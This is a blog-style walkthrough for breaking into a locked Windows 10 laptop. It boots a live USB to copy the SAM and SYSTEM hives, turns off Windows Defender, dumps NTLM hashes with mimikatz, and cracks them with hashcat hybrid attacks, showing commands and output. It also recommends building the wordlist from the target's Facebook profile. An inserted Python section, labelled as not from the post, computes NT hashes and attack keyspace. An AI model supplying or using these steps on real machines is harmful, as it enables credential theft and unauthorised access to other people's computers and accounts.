Recently, my girlfriend forgot her Windows 10 password, locking her out of her almost-brand-new laptop. I took it as a personal challenge to break into the Windows security layer and extract her password. Resetting the password was not an option!
With the Windows 10 Anniversary Update, things got tougher when it comes to cracking the Windows password, but after trying different approaches I managed to do it. Here’s a guide that shows you the steps to follow.
TL;DR: We’ll be cracking a Windows 10 password without admin access, and this method works with the Windows 10 Anniversary Update!
Requirements: a password-locked computer, an unlocked computer, and one (or two) USB keys.
- Retrieve the encrypted Windows 10 password database: SAM and SYSTEM files
- Extract Windows 10 password hash from those files using mimikatz
- Crack the hash quickly using hashcat
Part I – Retrieving SAM and SYSTEM files from Windows
To extract those files without needing to log in to the computer, we’ll boot the system from an OS stored on a USB key. From there we can access the Windows file system.
Step 1 – Booting on a Live USB OS
You can download Kali Linux Light here: Kali Linux download page.
Flash the .iso onto the USB key using software like ISO to USB or Rufus.
Now you can boot from the ISO. To do so, turn off the computer you want to crack and plug in the USB key. Then start the computer and enter the BIOS by pressing the F11 or DELETE key. Reorder the devices in Boot Priority, putting your USB key on top.
You will probably have to enable Legacy Support in your BIOS.
You can then Save and exit (F10), and proceed to booting on the OS.
Step 2 – Accessing Windows file system
Once the live OS is loaded, open up a file manager. Your Windows partition might already be available as read-only. If that’s the case, you can jump directly to Step 3.
If the Windows partition is not available, do the following:
Find the correct device to mount.
$ fdisk -l
Device      Boot  Start   End     Sectors   Size  System
/dev/sdb1         269     10382   81232672  260M  EFI System
/dev/sdb2         10383   19452   72846742  16M   Microsoft reserved
/dev/sdb3         10383   11034   5229157   118G  Microsoft basic data
/dev/sda7         11035   19439   67505130  980M  Windows recovery environment
You can deduce which device is the main Windows partition by looking at the Size column. Here 118G is the one we’re looking for, as the SSD capacity is 128 GB.
Also, you might have multiple physical disks, so it’s up to you to choose the right one.
In this case, the device we want to mount is /dev/sdb3.
Then you can mount the drive to the Linux file system:
$ mkdir /media/windows
$ sudo ntfs-3g -o remove_hiberfile /dev/sdb3 /media/windows
If the second command fails, you can do:
$ sudo ntfsfix /dev/sdb3
Mounting volume... Windows is hibernated, refused to mount.
FAILED
Attempting to correct errors...
Processing $MFT and $MFTMirr...
Reading $MFT... OK
Reading $MFTMirr... OK
Comparing $MFTMirr to $MFT... OK
Processing of $MFT and $MFTMirr completed successfully.
Setting required flags on partition... OK
Going to empty the journal ($LogFile)... OK
Windows is hibernated, refused to mount.
Remount failed: Operation not permitted
Even if it reports “Remount failed”, we can still mount the Windows partition using:
$ sudo ntfs-3g -o remove_hiberfile /dev/sdb3 /media/windows
$ cd /media/windows
$ ls
Now, if you mounted the correct device, the ls command should display a list of familiar directories: “Windows”, “Program Files (x86)”, “Users”.
Step 3 – Dumping SAM and SYSTEM files
Now, assuming that we successfully mounted the Windows partition in /media/windows, copy the following files (the SAM and SYSTEM registry hives) onto a USB key:
/media/windows/Windows/System32/config/SAM
/media/windows/Windows/System32/config/SYSTEM
Those two files will be needed to retrieve the hash of your Windows 10 password.
You can now log out of the live OS; we’re done with this part.
Part II – Getting the hash
This part will be much quicker, but it’s where the Windows 10 Anniversary Update can cause trouble if you’re not using the right software.
First, disable Windows Defender Real-time Protection (Windows start menu -> Search “Windows Defender” -> Windows Defender Security Center -> Virus & threat protection -> Virus & threat protection settings -> Turn off “Real-time Protection”).
Then, download and extract the latest mimikatz release: Mimikatz releases page.
Copy the SAM and SYSTEM files into mimikatz/x64.
Now open a terminal in the mimikatz/x64 directory (you can do that by typing “cmd” in the Windows Explorer address bar).
C:\Users\me\Downloads\mimikatz\x64> mimikatz.exe

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##   /* * *
 ## \ / ##    Benjamin DELPY `gentilkiwi` ( firstname.lastname@example.org )
 '## v ##'    http://blog.gentilkiwi.com/mimikatz                     (oe.eo)
  '#####'                                     with 13 modules * * */

mimikatz # lsadump::sam /system:SYSTEM_export /SAM:SAM_export
Where SYSTEM_export and SAM_export are the files we copied in the previous step.
Even though we can’t retrieve the actual Windows 10 password right now, the tool gives us its hash. It lists the available users and their respective hashes. Find the one you want to crack and you’re ready for the next part.
Part III – Cracking the hash
Download hashcat: grab the binaries here.
Now, we have to gather as much information as we can about the password we’re about to crack. This lets the cracking tool finish significantly faster.
You should first ask the owner of the device what kind of Windows password they usually use, in order to get a rough idea of its structure. If the password is not completely random, you can use a dictionary to apply your brute-force power more cleverly. With hashcat, this is called a hybrid attack.
For instance, in my case, the forgotten password was probably a common name followed by a few random-ish letters/numbers (e.g. tomsdev54d). Assuming you stored the hash in phihash.txt and that you have a dictionary file phidict.log, here’s the hashcat command to match this kind of password:
hashcat64.exe -m 1000 -a 6 phihash.txt phidict.log ?a?a?a
If the dictionary contains “tomsdev”, the password will be cracked in less than a minute and the result will be written to the file hashcat.potfile!
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: phihash.txt
Time.Started.....: Tue Dec 05 17:00:33 2017 (5 secs)
Time.Estimated...: Tue Dec 05 17:00:38 2017 (0 secs)
Guess.Base.......: File (phidict.log), Left Side
Guess.Mod........: Mask (?a?a?a) , Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.Dev.#1.....: 2674.4 MH/s (4.25ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 13245574144/22427215250 (59.06%)
Rejected.........: 0/13245574144 (0.00%)
Restore.Point....: 0/26158 (0.00%)
Candidates.#1....: ≡ƒÿï,bS -> logof1K
HWMon.Dev.#1.....: Temp: 52c Fan: 33% Util: 86% Core:1885MHz Mem:3802MHz Bus:16

Started: Tue Dec 05 17:00:31 2017
Stopped: Tue Dec 05 17:00:40 2017
Searching more efficiently
If we had to use brute force to find this 10-character password, it would probably have taken days. Instead, we’re searching all combinations of “<dictionary word><up to 3 random characters>”. In terms of complexity this is roughly equivalent to a password of length 4. You can then tweak the pattern according to your needs (see the hashcat documentation for more information).
For instance, to match the slightly different pattern “<up to 3 random characters><dictionary word>”, change the command to:
hashcat64.exe -m 1000 -a 6 phihash.txt ?a?a?a phidict.log
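To see why the hash from the SAM falls so quickly, and to check the arithmetic behind the status line above, here is an added example (not code from the post): it computes the NT hash exactly as Windows stores it (unsalted MD4 over the UTF-16LE password) and sizes the hybrid keyspace using the post’s own figures (26158 dictionary words, mask ?a?a?a, 2674.4 MH/s). It assumes hashcat’s ?a charset of 95 printable ASCII characters and that a mask is exactly its written length unless --increment is used, which is why the post’s Progress total is 26158 × 95³. On the defensive side, the same functions estimate how long a password of a given shape would survive an offline attack against a copied SAM.

```python
import struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, implemented here because hashlib's md4 is absent on many OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, additive constant, message-word order, per-step rotations)
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"  # pad: 0x80, zeros up to 56 mod 64, then the 64-bit LE bit length
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = list(state)
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                j = (-i) % 4  # step i updates a, d, c, b in turn
                x, y, z = s[(j + 1) % 4], s[(j + 2) % 4], s[(j + 3) % 4]
                t = (s[j] + fn(x, y, z) + X[idx] + k) & MASK
                r = shifts[i % 4]
                s[j] = ((t << r) | (t >> (32 - r))) & MASK
        state = [(u + v) & MASK for u, v in zip(state, s)]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """The NT hash stored in SAM: MD4 over the UTF-16LE password, no salt, no stretching."""
    return md4(password.encode("utf-16-le")).hex()

def hybrid_keyspace(dict_words: int, mask_len: int, charset: int = 95) -> int:
    """Candidates for hashcat -a 6 <dict> ?a...: ?a spans 95 printable ASCII characters and the
    mask is exactly mask_len characters unless --increment is given (assumption stated above)."""
    return dict_words * charset ** mask_len

def seconds_to_exhaust(keyspace: int, rate_hps: float) -> float:
    """Worst-case time to try every candidate at a given hash rate (hashes per second)."""
    return keyspace / rate_hps

if __name__ == "__main__":
    print(nt_hash("password"))  # 8846f7eaee8fb117ad06bdd830b7586c
    # Figures from the post's hashcat status: 26158-word dictionary, ?a?a?a, 2674.4 MH/s
    ks = hybrid_keyspace(26158, 3)
    print(ks, round(seconds_to_exhaust(ks, 2674.4e6), 1))  # 22427215250 candidates, ~8.4 s
    print(seconds_to_exhaust(95 ** 10, 2674.4e6) / 86400)  # plain 10-char ?a brute force, in days
```

Because the hash is unsalted, one GPU pass covers every candidate for every user in the dump at once, which is what makes full-disk encryption (keeping the SAM unreadable from a live USB) the mitigation that matters more than a slightly longer suffix.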
Which dictionary should I use?
As I mentioned, this depends entirely on the kind of password you want to crack. I recommend at least using a localized dictionary that matches the user’s mother tongue.
But a better way of doing this is to build a custom dictionary from the user’s own words, names, places, nicknames, etc. That’s what I did using Facebook, and it worked wonders, saving me countless days of brainless brute-forcing and wasted GPU cycles.
I hope that this guide helped you retrieve your lost Windows password and that you had fun acting hacker-ish while doing it. Feel free to ask any questions in the comments.